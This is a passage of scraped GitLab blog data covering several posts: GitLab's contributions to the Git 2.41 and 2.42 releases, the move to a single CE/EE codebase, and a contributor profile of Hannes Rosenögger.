--batch-check='%(objectsize)'\n285\n646\n428\n```\n\nSometimes, though, the pointer to a Git object can contain a filename\nor a directory name, as such a pointer is allowed to be in the form\n`\u003Cbranch>:\u003Cpath>`. 
For example `HEAD:Documentation` is a valid\npointer to the blob or the tree corresponding to the `Documentation`\npath on the current branch.\n\nThis used to be an issue because on some systems newline characters\nare allowed in file or directory names. So the `-z` option was\nintroduced last year in Git 2.38 to allow users to change the input\ndelimiter in batch modes to the NUL character.\n\n### Error output\nWhen the `-z` option was introduced, it wasn't considered useful to\nchange the output delimiter to be also the NUL character. This is\nbecause only tree objects can contain paths and the internal format\nof tree objects already uses NUL characters to delimit paths.\n\nUnfortunately, it was overlooked that in case of an error the pointer\nto the object is displayed in the error message:\n\n```\n$ echo 'HEAD:does-not-exist' | git cat-file --batch\nHEAD:does-not-exist missing\n```\n\nAs the error messages are printed along with the regular output of the\ncommand on stdout, passing in an invalid pointer with a number of\nnewline characters in it could make it very difficult to parse the\noutput.\n\n### -Z comes to the rescue\n[Toon Claes](https://gitlab.com/toon), Gitaly senior engineer, initially worked on a\npatch to just quote the pointer in the error message, but it was\ndecided in the Git mailing list discussions related to the patch that\nit would be better to just create a new `-Z` option. This option would\nchange both the input and the output delimiter to the NUL character,\nwhile the old `-z` option would be deprecated over time.\n\nSo [Patrick Steinhardt](https://gitlab.com/pks-gitlab), Gitaly staff engineer, implemented that new `-Z` option.\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/20221209150048.2400648-1-toon@iotcl.com/)\nand [here](https://lore.kernel.org/git/cover.1685710884.git.ps@pks.im/).\n\n## 3. 
Pass pseudo-options to `git rev-list --stdin`\n\n### Computing sizes\nIn GitLab, we need to have different ways to compute the size of Git\nrelated content. For example, we need to know:\n  - how much disk space a repository is using\n  - how big a specific Git object is\n  - how much additional space on a repository is required by a\n    specific set of revisions (and the objects they reference)\n\nKnowing \"how much disk space a repository is using\" is useful to\nenforce repository-related quotas and is easy to get using regular\nshell and OS features.\n\nSize information about a specific Git object is useful to enforce\nquotas related to maximum file size. It can be obtained using, for\nexample, `git cat-file -s \u003Cobject>` or\n`echo \u003Cobject> | git cat-file --batch-check='%(objectsize)'`\nas already seen above.\n\nComputing the space required by a set of revisions is useful, too, as\nforks can share Git content in what we call\n\"[pool repositories](https://docs.gitlab.com/ee/development/git_object_deduplication.html),\"\nand we want to discriminate how much content belongs to each forked\nrepository. Fortunately, `git rev-list` has a `--disk-usage` option\nfor this purpose.\n\n### Passing arguments to `git rev-list`\n`git rev-list` can take a number of different arguments and has a lot\nof different options. It's a fundamental command to traverse commit\ngraphs, and it should be flexible enough to fulfill a lot of different\nuser needs.\n\nWhen repositories grow, they often store a lot of references and a lot\nof files and directories, so there is often the need to pass a big\nnumber of references or paths as arguments to the\ncommand. References and paths can be quite long though.\n\nTo avoid hitting platform limits related to command line length, long\nago, a `--stdin` mode was added that allowed users to pass revisions\nand paths through stdin, instead of as command line\narguments. 
However, when that was implemented, it was not considered\nnecessary to allow options or pseudo-options, like `--not`,\n`--glob=...`, or `--all` to be passed through stdin.\n\nThis appeared to be a problem for GitLab, as for computing sizes for\nforked repositories we needed some of the pseudo-options, and it would\nhave been intricate and possibly buggy to pass some of them and their\narguments as arguments on the command line while others were passed\nthrough stdin.\n\n### Allowing pseudo-options\nTo fix this issue, Patrick Steinhardt implemented a small patch series to\nallow pseudo-options through stdin.\n\nWith it, in Git 2.42, one can now pass pseudo-options, like `--not`,\n`--glob=...`, or `--all` through stdin when the `--stdin` mode is used.\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/cover.1686744685.git.ps@pks.im/).\n\n## 4. Code and test improvements\nWhile looking at some Git code, we are often tempted to modify nearby\ncode, either to change only its style when the code is ancient and it\nwould look better using Git's current code style, or to refactor it to\nmake it cleaner. 
This is why we sometimes send small patch series that\ndon't have a real GitLab related purpose.\n\nIn Git 2.42, examples of style code improvements we made are the\n[part1](https://lore.kernel.org/git/pull.1513.git.git.1684440205.gitgitgadget@gmail.com/)\nand\n[part2](https://lore.kernel.org/git/pull.1514.git.git.1684599239.gitgitgadget@gmail.com/)\ntest code modernization patches from John Cai.\n\nAnd [here](https://lore.kernel.org/git/cover.1684324059.git.ps@pks.im/) is\nan example of a refactoring to cleanup some code by Patrick Steinhardt.\n","product",[751,930,9,267],{"slug":1498,"featured":6,"template":689},"contributions-to-git-2-42-release","content:en-us:blog:contributions-to-git-2-42-release.yml","Contributions To Git 2 42 Release","en-us/blog/contributions-to-git-2-42-release.yml","en-us/blog/contributions-to-git-2-42-release",{"_path":1504,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1505,"content":1510,"config":1516,"_id":1518,"_type":14,"title":1519,"_source":16,"_file":1520,"_stem":1521,"_extension":19},"/en-us/blog/contributions-to-latest-git-release",{"title":1506,"description":1507,"ogTitle":1506,"ogDescription":1507,"noIndex":6,"ogImage":1487,"ogUrl":1508,"ogSiteName":673,"ogType":674,"canonicalUrls":1508,"schema":1509},"Git 2.41 release - Here are five of our contributions in detail","Find out how GitLab's Git team helped improve the latest version of Git.","https://about.gitlab.com/blog/contributions-to-latest-git-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git 2.41 release - Here are five of our contributions in detail\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2023-06-20\",\n      }",{"title":1506,"description":1507,"authors":1511,"heroImage":1487,"date":1513,"body":1514,"category":1119,"tags":1515},[1512],"John Cai","2023-06-20","\n[Git 
2.41](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.41.0.txt)\nwas officially released on June 1, 2023, and included some improvements from GitLab's Git team. Git is the foundation of\nrepository data at GitLab. GitLab's Git team works on everything from new\nfeatures, performance improvements, documentation improvements, and growing the Git\ncommunity. Often our contributions to Git have a lot to do with the way we integrate Git into\nour services at GitLab. Here are some highlights from this latest Git release,\nand a window into how we use Git on the server side at GitLab.\n\n## 1. Machine-parseable fetch output\nWhen `git-fetch` is run, the output is a familiar for users of Git and looks\nsomething like this:\n\n```bash\n> git fetch\nremote: Enumerating objects: 296, done.\nremote: Counting objects: 100% (189/189), done.\nremote: Compressing objects: 100% (103/103), done.\nremote: Total 296 (delta 132), reused 84 (delta 84), pack-reused 107\nReceiving objects: 100% (296/296), 184.46 KiB | 11.53 MiB/s, done.\nResolving deltas: 100% (173/173), completed with 42 local objects.\nFrom https://gitlab.com/gitlab-org/gitaly\n   cfd146b4d..a69cf20ce  master                                                                             -> origin/master\n   3a877b8f3..854f25045  15-11-stable                                                                       -> origin/15-11-stable\n * [new branch]          5316-check-metrics-and-decide-if-need-to-context-cancel-the-running-git-process-in -> origin/5316-check-metrics-and-decide-if-need-to-context-cancel-the-running-git-process-in\n + bdd3c05a2...0bcf6f9d4 blanet_default_branch_opt                                                          -> origin/blanet_default_branch_opt  (forced update)\n * [new branch]          jt-object-pool-disconnect-refactor                                                 -> origin/jt-object-pool-disconnect-refactor\n + f2447981c...34e06e106 
jt-replicate-repository-alternates                                                 -> origin/jt-replicate-repository-alternates  (forced update)\n * [new branch]          kn-logrus-update                                                                   -> origin/kn-logrus-update\n + 05cea76f3...258543674 kn-smarthttp-docs                                                                  -> origin/kn-smarthttp-docs  (forced update)\n * [new branch]          pks-git-pseudorevision-validation                                                  -> origin/pks-git-pseudorevision-validation\n + 2e8d0ccd5...bf4ed8a52 pks-storage-repository                                                             -> origin/pks-storage-repository  (forced update)\n * [new branch]          qmnguyen0711/expose-another-port-for-pack-rpcs                                     -> origin/qmnguyen0711/expose-another-port-for-pack-rpcs\n + 82473046f...8e23e474c use_head_reference\n```\n\nThe problem with this output is that it's not meant for machines to parse.\n\nBut why would it be useful to make this output parseable by machines? To understand\nthis, we need to back up a little bit and talk about Gitaly Cluster. [Gitaly Cluster](https://docs.gitlab.com/ee/administration/gitaly/#gitaly-cluster)\nis a service at GitLab that provides high availability of Git repositories by\nreplicating repository writes to replica nodes. Each time a write comes in which\nchanges a Git repository (for example, a push that updates a reference) the write goes to\nthe primary node, and to all replica nodes before the write can succeed. A\nvoting mechanism takes place where the nodes vote on what its updated\nvalue for the reference would be. This vote succeeds when a quorum of replica\nnodes have successfully written the ref, and the write succeeds.\n\nOne of our remote procedure calls (RPCs) in Gitaly runs `git-fetch(1)` for repository mirroring. 
By\ndefault, when `git-fetch(1)` is run, it will update any references that are able\nto be fast-forwarded, while any reference that has since diverged will not\nbe updated.\n\nAs mentioned above, whenever there is an operation that modifies a repository, there\nis a voting mechanism that ensures the same modification is made to all replica nodes.\nTo dive in even a little deeper, our voting mechanism leverages Git's reference transaction hook,\nwhich runs an executable once per reference transaction. `git-fetch(1)` by default will\nstart a reference transaction per reference it updates. A fetch that updates hundreds or\neven thousands of references would thus vote once per reference that gets updated.\n\nIn the following sequence diagram, we are only showing one Gitaly node, but for a Gitaly Cluster\nwith, let's say, three nodes, what happens with the Gitaly primary also happens in\nthe replicas.\n\n```mermaid\nsequenceDiagram\n    participant user\n    participant GitlabUI as Gitlab UI\n    participant p as Praefect\n    participant g0 as Gitaly (primary)\n    participant git as Git\n    user->>GitlabUI: mirror my repository\n    GitlabUI->>p: FetchRemote\n    activate p\n    p->>g0: FetchRemote\n    activate g0\n    g0->>git: fetch-remote\n    activate git\n    git->>g0: vote on refs/heads/branch1 update\n    g0->>p: vote on refs/heads/branch1 update\n    git->>g0: vote on refs/heads/branch2 update\n    g0->>p: vote on refs/heads/branch2 update\n    git->>g0: vote on refs/heads/branch3 update\n    g0->>p: vote on refs/heads/branch3 update\n    deactivate git\n    note over p: vote succeeds\n    p->>GitlabUI: success\n    deactivate g0\n    deactivate p\n\n```\n\nThis is inefficient. Ideally we would want to vote once per batch of references\nupdated from one `git-fetch(1)` call. There is an option `--atomic` in\n`git-fetch(1)` that will open one reference transaction for all references\nupdated by `git-fetch(1)`. 
However, when `--atomic` is used, a `git-fetch` call will fail if any references have since diverged. This is not how we want repository mirroring to work. We actually want `git-fetch` to update whichever refs it can.\n\nSo, that means we cannot use the `--atomic` flag and are thus stuck voting per reference we update.\n\n### Solution: Handle the reference update ourselves\nThe way we are solving this inefficiency is to handle the reference update\nourselves. Instead of relying on `git-fetch(1)` to both fetch the objects and\nupdate all the references, we can use the `--dry-run` option of `git-fetch(1)`\nto first fetch the objects into a quarantine directory. Then if we can know\nwhich references *would* be updated, we can start a reference transaction\nourselves with `git-update-ref(1)` and update all the refs in one transaction,\nhence triggering a single vote only.\n\n```mermaid\n\nsequenceDiagram\n    participant user\n    participant Gitlab UI\n    participant p as Praefect\n    participant g0 as Gitaly (primary)\n    participant git as Git\n    user->>Gitlab UI: mirror my repository\n    Gitlab UI->>p: FetchRemote\n    activate p\n    p->>g0: FetchRemote\n    g0->>git: fetch-remote --dry-run --porcelain\n    activate git\n    note over git: objects are fetched into a quarantine directory\n    git->>g0: branch1, branch2, branch3 will be updated\n    deactivate git\n    g0->>git: update-ref\n    activate git\n    note over git: update branch1, branch2, branch3 in a single transaction\n    git->>g0: reference transaction hook\n    deactivate git\n    g0->>p: vote on ref updates\n    note over p: vote succeeds\n    p->>Gitlab UI: success\n    deactivate p\n\n```\n\nA requirement for this however, is that we would be able to parse the output of\n`git-fetch(1)` to tell which refs will be updated and to what values. 
Currently\nin `--dry-run`, `git-fetch(1)`'s output cannot be parsed by a machine.\n\n[Patrick Steinhardt](https://gitlab.com/pks-gitlab), Staff Backend Engineer, Gitaly, added a  `--porcelain` [option to git-fetch](https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---porcelain)\nthat causes `git-fetch(1)` to gives its output in a machine-parseable format.\n\n```\n> git fetch --porcelain --dry-run --quiet\n* cd7ec0e2505463855d04f0a685d53af604079bdf 023a4cca58ac713090df15015a2efeadc73be522 refs/remotes/origin/master\n* 0000000000000000000000000000000000000000 b4a007671bd331f1c6f5857aa9a6ab95d500b412 refs/remotes/origin/alejguer-improve-readabiliy-geo\n  2314938437eb962dadd6a88f45d463f8ed2c7cec 3d3e36fa40e9b87b90ef31f80c63c767d0ef3638 refs/remotes/origin/ali/document-keyless-container-signing\n+ c8107330f8d5a938f6349743310db030ca5159e6 e155670196e4974659304c79e670b238192bce08 refs/remotes/origin/fc-add-failed-jobs-in-mr-part-2\n+ 9ec873de405b3c5078ad1c073711a222e7734337 eb7947e37d05460a94c988bf1f408f96228dd50d refs/remotes/origin/fc-mvc-details-page\n* 0000000000000000000000000000000000000000 36d214774f39d3c3d0569df8befd2b46d22ea94b refs/remotes/origin/group-runner-docs\n+ b357bfdec53b96e76582ac5dd64deb2d35dbe697 7b85d775b1a46ea94e0b241aa0b6aa37ae2e0b69 refs/remotes/origin/jwanjohi-add-abuse-training-data-table\n+ c9beb0b9c0b933903c12393acaa2c4447bb9035f fd13eda262c67a48495a0695659fea10b32e7e02 refs/remotes/origin/jy-permissions-blueprint\n+ 9ecf5a7fb7ca39a6a4296e569af0ddff1058a830 3341369e650c931c46d9880f3b781dc1e21c9f75 refs/remotes/origin/kassio/spike-pages-review-apps\n```\n\nThis change allows us to be much more efficient when mirroring repositories.\n\nDetails of the patch series, including discussions can be found [here](https://lore.kernel.org/git/cover.1683721293.git.ps@pks.im/).\n\n## 2. 
A new way to read Git attribute files\n[Git attribute](https://docs.gitlab.com/ee/user/project/git_attributes.html) is\na way to define attributes in a Git repository such as syntax highlighting. Until now, Git only read `.gitattributes` files in the worktree or the\n`.git/info/attributes` files. On Gitaly servers, we store repositories on disk\nas [bare\nrepositories](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---bare).\nThis means that on the server we don't keep worktrees around. To\nsupport gitattributes on GitLab then, we use a workaround whereby when the user\nchanges attributes on the default branch, we copy the contents of the blob\n`HEAD:.gitattributes` to the `info/attributes` file.\n\n\u003Cpre class=\"mermaid\">\nflowchart TD\n  A[User A] -->|edit HEAD:.gitattributes\u003Cbr/>git push| B[Gitaly]\n  B --> |copy HEAD:.gitattributes\u003Cbr/>to info/attributes| C[info/attributes file]\n  D[GitLab UI] --> |Display code with syntax highlighting| B\n  B -.->|how should I do syntax highlighting?\u003Cbr/>Read info/attributes file| C   \n\u003C/pre>\n\n### Solution: New git option to read attribute files directly\nTo get rid of this extra step of copying a blob to `info/attributes`,\nI added a new git\n[option](https://git-scm.com/docs/git#Documentation/git.txt---attr-sourcelttree-ishgt)\n`--attr-source=\u003Ctree>` whereby a caller can pass in a tree from which Git will\nread the attributes file directly. This way Git can read the attributes blob directly\nwithout a worktree and without having to copy the contents to `info/attributes` each time it changes.\n\n\u003Cpre class=\"mermaid\">\nflowchart TD\n    A[User A] -->|edit HEAD:.gitattributes\u003Cbr/>git push| B[Gitaly]\n    D[GitLab UI] --> |Display code with syntax highlighting|B\n    B --> |Directly read the HEAD:.gitattributes blob|B\n\u003C/pre>\n\nHaving this feature in Git allows us to simplify this process a lot. 
We no longer\nhave to manually copy over the contents to a separate file. Internally, this\nallows us to delete two RPCs, reducing complexity and improving performance.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/pull.1470.v6.git.git.1683346530487.gitgitgadget@gmail.com/).\n\n## 3. Bug fix in commit-graph generation numbers\nA regression for truncated commit-graph generation numbers is a bug that we have been hitting for\nspecific repositories, corrupting the commit-graph. The [commit\ngraph](https://git-scm.com/docs/commit-graph) is an important Git optimization\nthat speeds up commit graph walks. Commit graph walks happen whenever Git has to\nwalk through commit history. Any time we display commit history in the UI, for\ninstance, it will trigger a commit graph walk. Keeping these fast is crucial to a\nsnappy browsing experience.\n\n### Solution: A patch series to fix the bug\nPatrick submitted a patch series to fix the regression for truncated commit-graph generation numbers bug.\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/f8a0a869e8b0882f05cac49d78f49ba3553d3c44.1679904401.git.ps@pks.im/).\n\n## 4. Fix for stale lockfiles in `git-receive-pack`\n`git-receive-pack(1)` is a Git command that handles the server-side of pushes. When `git push` is run\nagainst a GitLab server, Gitaly will handle the `ssh` or `http` request and\nspawn a `git-receive-pack(1)` process behind the scenes to handle the push.\n\n`git-receive-pack(1)` will write a lockfile when processing packfiles in order\nto prevent a race condition where a concurrent garbage-collecting process tries\nto delete the new packfile that is not yet being referenced by anything.\n\nWhen the `git-receive-pack(1)` process dies prematurely for whatever reason, this\nlockfile was being left around instead of being cleaned up. 
Busy repositories\nthat received many pushes a day could grow in size quickly due to the\naccumulation of these lockfiles.\n\n### Solution: A patch series to clean up unused lockfiles\nPatrick fixed this by submitting a patch series that allows `git-receive-pack(1)` to clean up its unused lockfiles. This allows GitLab to save space on its servers from having to keep useless lockfiles around.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/e1ee1d8026a361bc58d16bc741e2b347ada7a53e.1678431076.git.ps@pks.im/).\n\n## 5. Fixed geometric repacking with alternate object databases\n[Geometric repacking](https://git-scm.com/docs/git-repack#Documentation/git-repack.txt---geometricltfactorgt)\nis a repacking strategy where instead of packing everything into one giant pack\neach time, several packs are kept around according to a geometric progression\nbased on object size.\n\nThis is useful for large and very busy repositories so that housekeeping doesn't\nhave to pack all of its objects into a giant pack each time.\n\nUnfortunately, geometric repacking had various corner case bugs when an\nalternate object database was involved. At GitLab, we leverage the Git\nalternates mechanism to save space in the case of forks. A fork of a repository\nshares most files. Instead of keeping a second copy of all the data, when we\ncreate a fork, we can deduplicate this data by having both the source\nrepository, as well as the fork repository share objects by pointing to a third\nrepository. This means that only one copy of a blob needs to be kept around\nrather than two.\n\nGeometric repacking bugs prevented it from working in an object database that\nwas connected to an alternate object database.\n\n### Solution: A patch series\nThese bugs have been fixed via a patch series from Patrick. 
This\nhelps us as we improve our implementation of object pools in Gitaly.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/cover.1681452028.git.ps@pks.im/).\n",[751,930,9,267],{"slug":1517,"featured":6,"template":689},"contributions-to-latest-git-release","content:en-us:blog:contributions-to-latest-git-release.yml","Contributions To Latest Git Release","en-us/blog/contributions-to-latest-git-release.yml","en-us/blog/contributions-to-latest-git-release",{"_path":1523,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1524,"content":1529,"config":1534,"_id":1536,"_type":14,"title":1537,"_source":16,"_file":1538,"_stem":1539,"_extension":19},"/en-us/blog/contributor-after-single-code-base",{"title":1525,"description":1526,"ogTitle":1525,"ogDescription":1526,"noIndex":6,"ogImage":1348,"ogUrl":1527,"ogSiteName":673,"ogType":674,"canonicalUrls":1527,"schema":1528},"Contributing to GitLab after move to a single codebase","How contributors can benefit from the move to a single codebase for GitLab Community and Enterprise Editions.","https://about.gitlab.com/blog/contributor-after-single-code-base","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributing to GitLab after move to a single codebase\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-10-02\",\n      }",{"title":1525,"description":1526,"authors":1530,"heroImage":1348,"date":1531,"body":1532,"category":951,"tags":1533},[704],"2019-10-02","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nBy now, many readers will already be familiar with GitLab's move to a single Rails codebase for GitLab Community(CE) and Enterprise(EE) Editions. 
The motivation for the change and work involved were well documented in blog posts by [Marin Jankovski](/blog/merging-ce-and-ee-codebases/) and [Yorick Peterse](/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition/). Also, if you had an open merge request (MR) in CE, you probably saw messages from the GitLab bot (`@gitlab-bot`) like the one below. \n\n![GitLab bot message](https://about.gitlab.com/images/blogimages/Bot-closing-GitLab-FOSS-MR.png){: .shadow.medium.center} \n## Only impacts contributions to the new GitLab repository\n\nI want to highlight a couple of things with this move to a single codebase. First, if you are contributing to other GitLab projects such as [Charts](https://gitlab.com/gitlab-org/charts/gitlab), [GitLab Design System](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com), [GitLab UI](https://gitlab.com/gitlab-org/gitlab-ui), [Omnibus](https://gitlab.com/gitlab-org/omnibus-gitlab), [Runner](https://gitlab.com/gitlab-org/gitlab-runner), etc., this move to a single Rails codebase for CE & EE will not have any impact on your contribution workflow. \n## Licenses remain the same\n\nNext, there is no change to licensing. GitLab CE will remain open source under the MIT license. GitLab EE code will reside in the [`ee` directory](https://gitlab.com/gitlab-org/gitlab/tree/master/ee) in the [new gitlab (formerly gitlab-ee) project](https://gitlab.com/gitlab-org/gitlab) and will remain source available under a proprietary license.  \n## Higher efficiency and easier to contribute\n\nWith this move to a single codebase, there will be less duplicate work and manual intervention required from GitLab team members in the future. 
This gives them more bandwidth for higher value activities, including helping with wider community contributions.\n\nThe single codebase should also simplify things for wider community members, as you can now search [for issues in one place](https://gitlab.com/gitlab-org/gitlab/issues), and there's also [one place for MRs](https://gitlab.com/gitlab-org/gitlab/merge_requests).\n\nAs another example for improvement, in the past, contributors occasionally had to deal with `ee_compat_check` errors when they submitted an MR in CE. This required opening an MR in EE (or asking a GitLab team member to open an EE MR) and then wait for it to be merged before continuing with the CE MR. This was a pain point for many contributors, and I am excited that this will be eliminated with the single codebase. \n## Re-submitting MRs against the new GitLab project\n\nIf you have an MR that was auto-closed by the GitLab bot in CE (now [GitLab FOSS](https://gitlab.com/gitlab-org/gitlab-foss)), you can continue your work by creating a new MR in the [new gitlab project](https://gitlab.com/gitlab-org/gitlab) following the steps outlined in the GitLab bot message above. If you have any questions or encounter issues when you open a new MR, please feel free to [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) the reviewers from your original MR or me and ask for help.  \n\nDuring and after the transition, I was happy to see MR's continuing to come in from the wider community so it doesn't look like this was a major disruption. 
However, if you have any questions or feedback you are welcome to [open an issue in gitlab](https://gitlab.com/gitlab-org/gitlab/issues) or reach out to me at `rpaik@gitlab.com`.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}",[267,779,9],{"slug":1535,"featured":6,"template":689},"contributor-after-single-code-base","content:en-us:blog:contributor-after-single-code-base.yml","Contributor After Single Code Base","en-us/blog/contributor-after-single-code-base.yml","en-us/blog/contributor-after-single-code-base",{"_path":1541,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1542,"content":1547,"config":1552,"_id":1554,"_type":14,"title":1555,"_source":16,"_file":1556,"_stem":1557,"_extension":19},"/en-us/blog/contributor-post-hannes",{"title":1543,"description":1544,"ogTitle":1543,"ogDescription":1544,"noIndex":6,"ogImage":1192,"ogUrl":1545,"ogSiteName":673,"ogType":674,"canonicalUrls":1545,"schema":1546},"GitLab Code Contributor: Hannes Rosenögger","Core team member Hannes Rosenögger shares his experience contributing to GitLab since 2014.","https://about.gitlab.com/blog/contributor-post-hannes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Hannes Rosenögger\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-11-20\",\n      }",{"title":1543,"description":1544,"authors":1548,"heroImage":1192,"date":1549,"body":1550,"category":10,"tags":1551},[704],"2018-11-20","\nFor this month's blog post, we're featuring another [Core Team](/community/core-team/) member [Hannes Rosenögger](https://gitlab.com/haynes).\n\n### When did you first contribute to GitLab?\n\nMy first [MR to close multiple issues with one commit](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/263) was back in December 2014. 
So that's almost four years ago!\n\n### Why and how did you decide to contribute to GitLab?\n\n I used the Community Edition privately and noticed that mentioning multiple issues in an MR only closed the first issue. Since GitLab was open source and the fix was easy, I decided to fix it myself. GitLab's open policy about everything within the company was also a huge factor.\n\n### Which area(s) of the GitLab product have you been contributing to?\n\nI guess it's been pretty random for me. Most of my contributions have been on the backend side and documentation fixes, but if I see something that I can easily fix or I need a feature for my work, I try to make a contribution. I also provide support on the #gitlab IRC channel on freenode. My IRC handle is `haynes`.\n\n### Can you tell us what you do professionally?\n\nI am a Java software developer for a public sector organization in Germany.\n\n### What do you like to do when you're not working?\n\nWhen I'm not working, I'm probably doing something for my local scout group. I enjoy working with the kids and teaching. I also like to fix things from coffee machines to cars. 
Basically anything that I can fix with a bit of work.\n\n\u003C!-- carousel -->\n\n\u003Cdiv id=\"carousel-example-generic-5\" class=\"carousel slide medium center\" data-ride=\"carousel\" data-interval=\"10000\">\n  \u003C!-- Indicators -->\n  \u003Col class=\"carousel-indicators\">\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"0\" class=\"active\">\u003C/li>\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"1\">\u003C/li>\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"2\">\u003C/li>\n  \u003C/ol>\n\n  \u003C!-- Wrapper for slides -->\n  \u003Cdiv class=\"carousel-inner\" role=\"listbox\">\n    \u003Cdiv class=\"item active\">\n          \u003Cimg src=\"/images/blogimages/Hannes-blogpost/workbench.jpg\" alt=\"Hannes on workbench\">\n    \u003C/div>\n    \u003Cdiv class=\"item\">\n      \u003Cimg src=\"/images/blogimages/Hannes-blogpost/dishwasher.jpg\" alt=\"Hannes working on his dishwasher\">\n    \u003C/div>\n    \u003Cdiv class=\"item\">\n      \u003Cimg src=\"/images/blogimages/Hannes-blogpost/washing_machine.jpg\" alt=\"Washing machine repair\">\n    \u003C/div>\n\n  \u003C/div>\n\n  \u003C!-- Controls -->\n  \u003Ca class=\"left carousel-control\" href=\"#carousel-example-generic-5\" role=\"button\" data-slide=\"prev\">\n    \u003Csvg class=\"glyphicon glyphicon-chevron-left\" width=\"11\" height=\"19\" viewBox=\"0 0 11 19\" xmlns=\"http://www.w3.org/2000/svg\">\u003Cpath d=\"M.44 10.13l8.345 8.345 2.007-2.007-6.814-6.814 6.814-6.815L8.785.832.44 9.177a.652.652 0 0 0-.202.477c0 .183.067.343.202.477z\" fill-rule=\"evenodd\"/>\u003C/svg>\n    \u003Cspan class=\"sr-only\">Previous\u003C/span>\n  \u003C/a>\n  \u003Ca class=\"right carousel-control\" href=\"#carousel-example-generic-5\" role=\"button\" data-slide=\"next\">\n    \u003Csvg class=\"glyphicon glyphicon-chevron-right\" width=\"11\" height=\"19\" viewBox=\"0 0 11 19\" xmlns=\"http://www.w3.org/2000/svg\">\u003Cpath 
d=\"M10.59 10.13l-8.344 8.345L.24 16.468l6.814-6.814L.24 2.839 2.246.832l8.345 8.345a.652.652 0 0 1 .201.477.652.652 0 0 1-.201.477z\" fill-rule=\"evenodd\"/>\u003C/svg>\n    \u003Cspan class=\"sr-only\">Next\u003C/span>\n  \u003C/a>\n\u003C/div>\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nContributing to GitLab is easier than it looks at a first glance and you can contribute to the community in many different ways. For example, if you want to help out translating the GitLab user interface to your native language on [CrowdIn](https://translate.gitlab.com/), this does not require programming skills or any special setup on your laptop. Also when you want to contribute code, reviewers are normally quite fast in getting back to you and are more than happy to help if you have any questions.\n\nIf you are unsure how to get started or you need help, anyone should feel free to ping me on Twitter ([@hrosenoegger](https://twitter.com/hrosenoegger)) or in the #gitlab IRC channel on [freenode](http://freenode.net/).\n\n### Anything else you want to share with the community?\n\nI love the fact that GitLab actually listens to the community. Even after they make a decision to add a new, paid feature, when community members believe it makes more sense to have the feature in [GitLab Core](/pricing/#self-managed) or the free tier of [GitLab.com](/pricing/), they will actually port it back. 
The [Squash and Merge feature](/releases/2018/06/22/gitlab-11-0-released/#squash-and-merge-in-gitlab-core-and-gitlabcom-free) is a good example of that.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1553,"featured":6,"template":689},"contributor-post-hannes","content:en-us:blog:contributor-post-hannes.yml","Contributor Post Hannes","en-us/blog/contributor-post-hannes.yml","en-us/blog/contributor-post-hannes",{"_path":1559,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1560,"content":1565,"config":1570,"_id":1572,"_type":14,"title":1573,"_source":16,"_file":1574,"_stem":1575,"_extension":19},"/en-us/blog/contributor-post-jacopo",{"title":1561,"description":1562,"ogTitle":1561,"ogDescription":1562,"noIndex":6,"ogImage":1192,"ogUrl":1563,"ogSiteName":673,"ogType":674,"canonicalUrls":1563,"schema":1564},"GitLab Code Contributor: Jacopo Beschi","Core Team member Jacopo Beschi shares why he loves contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-jacopo","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Jacopo Beschi\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-09-06\",\n      }",{"title":1561,"description":1562,"authors":1566,"heroImage":1192,"date":1567,"body":1568,"category":10,"tags":1569},[704],"2018-09-06","\n\nThis is the second blog post [highlighting GitLab community members](/blog/contributor-post-vitaliy/)\nwho are making code contributions to 
